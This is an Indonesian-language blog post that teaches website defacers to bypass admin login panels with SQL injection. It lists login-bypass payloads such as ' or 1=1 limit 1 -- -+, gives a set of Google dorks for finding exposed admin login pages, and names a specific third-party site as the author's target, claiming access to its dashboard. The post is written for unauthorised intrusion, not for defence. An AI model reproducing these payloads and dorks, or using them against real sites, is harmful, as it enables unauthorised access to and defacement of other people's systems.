Deface Bypass Admin

Dimax66 Oktober 24, 2023

 


Tutorial Bypass Admin Login Panel


Cara Deface Bypass Admin Login 


Cara Bypass Admin Login Panel 
Masuk Ke Dalam website orang secara tidak langsung.kali ini Gw bakalan share sedikit pengetahuan mengenai Cara Bypass Login Admin Panel atau yang lebih dikenal dengan teknik Bypass Admin. 

Cara kerja teknik bypass admin ini sebenarnya cukup simple, yakni karena tidak ada filterisasi karakter pada halaman login. Hanya dengan memasukan code SQL injection seseorang dapat masuk ke dashboard. Tanpa harus memiliki username dan password yang benar.

Daftar Isi

Cara Bypass Admin Login Panel 
Berikut Beberapa Code SQL Injection Bypass Admin
Daftar Dork Bypass Admin 
Menentukan Halaman Login 
Mencari Halaman Form. 
Cara Bypass Admin Login Panel 
Untuk melakukan teknik Bypass biasanya seorang attacker atau Hacker dan Defacer ini melakukan teknik dengan memasukan Query SQL inject. Yang biasanya berupa '=''OR' dan ' or 1=1 limit 1 -- -+ dengan menggunakan code inject ini maka hasilnya akan menjadi username:true password:true. 
Berikut Beberapa Code SQL Injection Bypass Admin
' or 1=1 limit 1 -- -+
'=''OR'
' and 'one'='one
' and 'one'='one--


Dengan Code SQL Injection tersebut Kalian dapat memanipulasi Login Admin Dan Me-bypassnya. pada tutorial kali ini,Gw membahas Cara Bypass Admin Login Panel. Simak Tutorialnya Dengan Bijak!

Daftar Dork Bypass Admin 

Berikut adalah beberapa dork yang bisa kalian kembangkan sendiri untuk mencari situs yang dapat di Bypass.
-=[Dork Vuln Bypass Sql]=-
inurl:/superadmin/ "login"
inurl:/login.php "admin"
inurl:/admin_login.php
inurl:/adminlogin.php
inurl:/loginadmin.php
inurl:/adminpanel/ "login"
inurl:/super_admin/ "login"
inurl:/backend/ "login"
inurl:/admin/ "username"
inurl:/panel/ "admin login"
inurl:/adm/login
inurl:/admin_site/login.php
ini rl:/admin/login.php

Menentukan Halaman Login

Cara yang pertama adalah kalian harus mencari halaman login admin tentunya, biasanya dengan mengakses /admin/ atau /admin/login maka akan muncul form untuk Login. 

Disini sebagai contoh saya menemukan sebuah website yang VULN dengan Bypass Admin. Maka saya tinggal masukan code SQL Injection nya. Maka saya berhasil masuk ke dashboard admin.


Inget Gk Semua Website Bisa Di Bypass

Target Gw:https://saviobaridua.in/applicationform/Admin/login.php

Oke Sekian Tutorialnya Terimakasih'

 

Dimax66

Diposting oleh Dimax66

Posting Komentar

0 Komentar